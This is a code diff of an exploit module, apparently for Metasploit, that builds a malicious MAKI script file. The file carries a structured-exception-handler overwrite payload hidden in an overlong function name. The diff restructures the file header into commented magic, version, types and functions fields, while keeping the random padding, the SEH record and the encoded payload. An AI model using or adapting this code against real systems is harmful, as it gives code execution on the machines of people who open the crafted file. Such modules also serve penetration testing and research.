@@ -77,60 +77,28 @@ def initialize(info = {})
7777
7878 def exploit
7979
80- header = "\x46 \x47 \x03 \x04 \x17 \x00 \x00 \x00 \x2A \x00 \x00 \x00 \x71 \x49 \x65 \x51 "
81- header << "\x87 \x0D \x51 \x4A \x91 \xE3 \xA6 \xB5 \x32 \x35 \xF3 \xE7 \x64 \x0F \xF5 \xD6 "
82- header << "\xFA \x93 \xB7 \x49 \x93 \xF1 \xBA \x66 \xEF \xAE \x3E \x98 \x7B \xC4 \x0D \xE9 "
83- header << "\x0D \x84 \xE7 \x4A \xB0 \x2C \x04 \x0B \xD2 \x75 \xF7 \xFC \xB5 \x3A \x02 \xB2 "
84- header << "\x4D \x43 \xA1 \x4B \xBE \xAE \x59 \x63 \x75 \x03 \xF3 \xC6 \x78 \x57 \xC6 \x87 "
85- header << "\x43 \xE7 \xFE \x49 \x85 \xF9 \x09 \xCC \x53 \x2A \xFD \x56 \x65 \x36 \x60 \x38 "
86- header << "\x1B \x46 \xA7 \x42 \xAA \x75 \xD8 \x3F \x66 \x67 \xBF \x73 \xF4 \x7A \x78 \xF4 "
87- header << "\xBB \xB2 \xF7 \x4E \x9C \xFB \xE7 \x4B \xA9 \xBE \xA8 \x8D \x02 \x0C \x37 \x3A "
88- header << "\xBF \x3C \x9F \x43 \x84 \xF1 \x86 \x88 \x5B \xCF \x1E \x36 \xB6 \x5B \x0C \x5D "
89- header << "\xE1 \x7D \x1F \x4B \xA7 \x0F \x8D \x16 \x59 \x94 \x19 \x41 \x99 \xE1 \xE3 \x4E "
90- header << "\x36 \xC6 \xEC \x4B \x97 \xCD \x78 \xBC \x9C \x86 \x28 \xB0 \xE5 \x95 \xBE \x45 "
91- header << "\x72 \x20 \x91 \x41 \x93 \x5C \xBB \x5F \xF9 \xF1 \x17 \xFD \x4E \x6D \x90 \x60 "
92- header << "\x7E \x53 \x2E \x48 \xB0 \x04 \xCC \x94 \x61 \x88 \x56 \x72 \xC0 \xBC \x3A \x40 "
93- header << "\x22 \x6F \xD6 \x4B \x8B \xA4 \x10 \xC8 \x29 \x93 \x25 \x47 \x4D \x3E \xAA \x97 "
94- header << "\xD0 \xF4 \xA8 \x4F \x81 \x7B \x0A \xF2 \x2A \x45 \x49 \x83 \xFA \xBB \xE4 \x64 "
95- header << "\xF4 \x81 \xD9 \x49 \xB0 \xC0 \xA8 \x5B \x2E \xC3 \xBC \xFD \x3F \x5E \xB6 \x62 "
96- header << "\x5E \x37 \x8D \x40 \x8D \xEA \x76 \x81 \x4A \xB9 \x1B \x77 \xBE \x97 \x4F \xCE "
97- header << "\xB0 \x77 \x19 \x4E \x99 \x56 \xD4 \x98 \x33 \xC9 \x6C \x27 \x0D \x20 \xC2 \xA8 "
98- header << "\xEB \x51 \x2A \x4B \xBA \x7F \x5D \x4B \xC6 \x5D \x4C \x71 \x38 \xBA \x1E \x8D "
99- header << "\x9E \x48 \x3E \x48 \xB9 \x60 \x8D \x1F \x43 \xC5 \xC4 \x05 \x40 \xC9 \x08 \x0F "
100- header << "\x39 \xAF \x23 \x4B \x80 \xF3 \xB8 \xC4 \x8F \x7E \xBB \x59 \x72 \x86 \xAA \xEF "
101- header << "\x0E \x31 \xFA \x41 \xB7 \xDC \x85 \xA9 \x52 \x5B \xCB \x4B \x44 \x32 \xFD \x7D "
102- header << "\x51 \x37 \x7C \x4E \xBF \x40 \x82 \xAE \x5F \x3A \xDC \x33 \x15 \xFA \xB9 \x5A "
103- header << "\x7D \x9A \x57 \x45 \xAB \xC8 \x65 \x57 \xA6 \xC6 \x7C \xA9 \xCD \xDD \x8E \x69 "
104- header << "\x1E \x8F \xEC \x4F \x9B \x12 \xF9 \x44 \xF9 \x09 \xFF \x45 \x27 \xCD \x64 \x6B "
105- header << "\x26 \x5A \x4B \x4C \x8C \x59 \xE6 \xA7 \x0C \xF6 \x49 \x3A \xE4 \x05 \xCB \x6D "
106- header << "\xC4 \x8A \xC2 \x48 \xB1 \x93 \x49 \xF0 \x91 \x0E \xF5 \x4A \xFF \xCF \xDC \xB4 "
107- header << "\xFE \x81 \xCC \x4B \x96 \x1B \x72 \x0F \xD5 \xBE \x0F \xFF \xE1 \x8C \xE2 \x01 "
108- header << "\x59 \xB0 \xD5 \x11 \x97 \x9F \xE4 \xDE \x6F \x51 \x76 \x0A \xBD \xF8 \xF0 \x80 "
109- header << "\xA5 \x1B \xA6 \x42 \xA0 \x93 \x32 \x36 \xA0 \x0C \x8D \x4A \x1B \x34 \x2E \x9B "
110- header << "\x98 \x6C \xFA \x40 \x8B \x85 \x0C \x1B \x6E \xE8 \x94 \x05 \x71 \x9B \xD5 \x36 "
111- header << "\xFD \x03 \xF8 \x4A \x97 \x95 \x05 \x02 \xB7 \xDB \x26 \x7A \x10 \xF2 \xD5 \x7F "
112- header << "\xC4 \xAC \xDF \x48 \xA6 \xA0 \x54 \x51 \x57 \x6C \xDC \x76 \x35 \xA5 \xBA \xB5 "
113- header << "\xB3 \x05 \xCB \x4D \xAD \xC1 \xE6 \x18 \xD2 \x8F \x68 \x96 \xC1 \xFE \x29 \x61 "
114- header << "\xB7 \xDA \x51 \x4D \x91 \x65 \x01 \xCA \x0C \x1B \x70 \xDB \xF7 \x14 \x95 \xD5 "
115- header << "\x36 \xED \xE8 \x45 \x98 \x0F \x3F \x4E \xA0 \x52 \x2C \xD9 \x82 \x4B \x3B \x9B "
116- header << "\x7A \x66 \x0E \x42 \x8F \xFC \x79 \x41 \x15 \x80 \x9C \x02 \x99 \x31 \xED \xC7 "
117- header << "\x19 \x53 \x98 \x47 \x98 \x63 \x60 \xB1 \x5A \x29 \x8C \xAA \x4D \xC1 \xBB \xE2 "
118- header << "\xF6 \x84 \x73 \x41 \xBD \xB3 \xB2 \xEB \x2F \x66 \x55 \x50 \x94 \x05 \xC0 \x73 "
119- header << "\x1F \x96 \x1B \x40 \x9B \x1B \x67 \x24 \x27 \xAC \x41 \x65 \x22 \xBA \x3D \x59 "
120- header << "\x77 \xD0 \x76 \x49 \xB9 \x52 \xF4 \x71 \x36 \x55 \x40 \x0B \x82 \x02 \x03 \xD4 "
121- header << "\xAB \x3A \x87 \x4D \x87 \x8D \x12 \x32 \x6F \xAD \xFC \xD5 \x83 \xC2 \xDE \x24 "
122- header << "\x6E \xB7 \x36 \x4A \x8C \xCC \x9E \x24 \xC4 \x6B \x6C \x73 \x37 \x00 \x00 \x00 "
123- header << "\x01 \x01 \x00 \x00 "
124-
12580 sploit = rand_text ( target [ 'Offset' ] )
12681 sploit << generate_seh_record ( target . ret )
12782 sploit << payload . encoded
128-
12983 length_sploit = [ sploit . length ] . pack ( "v" )
13084
85+ header = "\x46 \x47 " # magic
86+ header << "\x03 \x04 " # version
87+ header << "\x17 \x00 \x00 \x00 "
88+ types = "\x01 \x00 \x00 \x00 " # count
89+ # class 1 => Object
90+ types << "\x71 \x49 \x65 \x51 \x87 \x0D \x51 \x4A \x91 \xE3 \xA6 \xB5 \x32 \x35 \xF3 \xE7 "
91+ # functions
92+ functions = "\x37 \x00 \x00 \x00 " # count
93+ #function 1
94+ functions << "\x01 \x01 " # class
95+ functions << "\x00 \x00 " # dummy
96+ functions << length_sploit # function name length
97+ functions << sploit # crafted function name
98+
13199 maki = header
132- maki << length_sploit
133- maki << sploit
100+ maki << types
101+ maki << functions
134102
135103 print_status ( "Creating '#{ datastore [ 'FILENAME' ] } )
136104
0 commit comments